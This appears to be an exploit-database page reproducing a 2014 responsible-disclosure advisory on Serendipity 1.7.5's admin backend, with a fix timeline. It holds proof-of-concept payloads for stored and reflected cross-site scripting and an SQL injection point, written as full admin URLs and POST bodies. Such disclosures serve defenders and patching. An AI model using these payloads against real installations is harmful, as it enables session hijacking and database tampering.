Menu

Search for hundreds of thousands of exploits

"S9Y Serendipity 1.7.5 - 'Backend' Multiple Vulnerabilities"

Author

Exploit author

"Stefan Schurtz"

Platform

Exploit platform

php

Release date

Exploit published date

2014-02-07

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
Advisory:		Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities
Advisory ID:		SSCHADV2014-003
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Serendipity 1.7.5
Vendor URL:		http://www.s9y.org/
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities

==========================
PoC-Exploit
==========================

// Stored-XSS with "Real name"

(1) Login as "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to "><script>alert(document.cookie)</script>

The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)

// SQL-Injection - with "serendipity[install_plugin]"

http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]

// Reflected XSS_1 - "serendipity[install_plugin]"

http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b<script>alert(1)</script>%2f%2f912

// Reflected XSS_2 - "serendipity[id]"

POST http://[target]/serendipity/serendipity_admin.php?

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Btimestamp%5D=1391086127&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=0fb9473e000f67c7d530e0698c8ff2dc&serendipity%5Btitle%5D=test1&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391086127&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A48&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test1&serendipity%5Ballow_comments%5D=true&serendipity%5Bextended%5D=

// Reflected XSS_3 - "serendipity[timestamp]"

POST http://[target]/serendipity/serendipity_admin.php?

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=d9e231ef9eaeb5e58336806484de7600&serendipity%5Btitle%5D=test&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391084636&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A23&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test%3Cstrong%3E%3C%2Fstrong%3E%3Cblockquote%3E%3C%2Fblockquote%3E&serendipity%5Ballow_comments%5D=true&serendipity%5Bmoderate_comments%5D=true&serendipity%5Bextended%5D

==========================
Solution
==========================

Upgrade to the latest version Serendipity 1.7.7

==========================
Disclosure Timeline
==========================

30-Jan-2014 - developer informed by email
30-Jan-2014 - feedback from developer
31-Jan-2014 - first diff tested
03-Feb-2014 - second diff tested
04-Feb-2014 - third diff tested
06-Feb-2014 - release of Serendipity 1.7.7

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://s9y.org/
http://blog.s9y.org/archives/253-Serendipity-1.7.7-released.html
http://www.darksecurity.de/advisories/2014/SSCHADV2014-003.txt
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2014-02-07 "S9Y Serendipity 1.7.5 - 'Backend' Multiple Vulnerabilities" webapps php "Stefan Schurtz"
2013-03-30 "WordPress Plugin Feedweb - 'wp_post_id' Cross-Site Scripting" webapps php "Stefan Schurtz"
2013-01-09 "WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities" webapps php "Stefan Schurtz"
2012-12-24 "Hero Framework - 'search?q' Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-12-24 "Hero Framework - users/login 'Username' Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-09-02 "Admidio 2.3.5 - Multiple Vulnerabilities" webapps php "Stefan Schurtz"
2012-08-18 "SaltOS - 'download.php' Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-07-09 "MGB - Multiple Cross-Site Scripting / SQL Injections" webapps php "Stefan Schurtz"
2012-05-19 "PHP Address Book 7.0.0 - Multiple Vulnerabilities" webapps php "Stefan Schurtz"
2012-05-17 "PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-05-08 "S9Y Serendipity 1.6 - 'Backend' Cross-Site Scripting / SQL Injection" webapps php "Stefan Schurtz"
2012-04-29 "Alienvault Open Source SIEM (OSSIM) 3.1 - Multiple Vulnerabilities" webapps php "Stefan Schurtz"
2012-03-28 "WordPress Plugin Integrator 1.32 - 'redirect_to' Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-03-28 "KnFTPd 1.0.0 - 'FEAT' Denial of Service (PoC)" dos windows "Stefan Schurtz"
2012-03-21 "CMSimple 3.3 - 'index.php' Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-03-12 "Wikidforum 2.10 - Search Field Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-03-12 "Wikidforum 2.10 - Advanced Search Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-03-12 "Wikidforum 2.10 - Advanced Search Multiple Field SQL Injections" webapps php "Stefan Schurtz"
2012-03-10 "PHP Address Book 6.2.12 - Multiple Vulnerabilities" webapps php "Stefan Schurtz"
2012-02-22 "ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-01-16 "Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-01-16 "BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-01-16 "phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-01-16 "ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-01-05 "VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting" webapps php "Stefan Schurtz"
2012-01-05 "SQLiteManager 1.2.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Stefan Schurtz"
2012-01-05 "SQLiteManager 1.2.4 - 'main.php?dbsel' Cross-Site Scripting" webapps php "Stefan Schurtz"
2011-12-26 "Nagios Plugins check_ups - Local Buffer Overflow (PoC)" dos linux "Stefan Schurtz"
2011-12-20 "Tiki Wiki CMS Groupware 8.1 - 'show_errors' HTML Injection" webapps php "Stefan Schurtz"
2011-12-16 "Seotoaster - SQL Injection" webapps php "Stefan Schurtz"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.